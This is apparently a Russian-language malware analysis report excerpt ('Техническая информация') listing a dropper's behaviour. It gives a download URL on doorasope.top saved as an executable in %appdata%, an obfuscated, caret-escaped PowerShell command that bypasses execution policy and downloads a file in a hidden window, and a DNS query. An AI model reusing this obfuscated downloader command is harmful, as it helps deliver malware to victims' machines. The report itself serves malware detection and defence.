Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^w^e^Rs^hElL.e^xe -ex^ECUTi^onPOlIc^Y bY^PAsS ^-^N^OPRO^fI^l^E ^-WiN^DOWs^tyl^e^ ^hI^dd^eN (ne^w-OBJ^eC^T^ ^sYSTeM^.n^et.wE^BCLIen^T^)^.do^wnl^oaDFil^E^('http://www....
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "PO^w^e^Rs^hElL.e^xe -ex^ECUTi^onPOlIc^Y bY^PAsS ^-^N^OPRO^fI^l^E ^-WiN^DOWs^tyl^e^ ^hI^dd^eN (ne^w-OBJ^eC^T^ ^sYSTeM^.n^et.wE^BCLIen^T^)^.do^wnl^oaDFil^E^('http://www....' (со скрытым окном)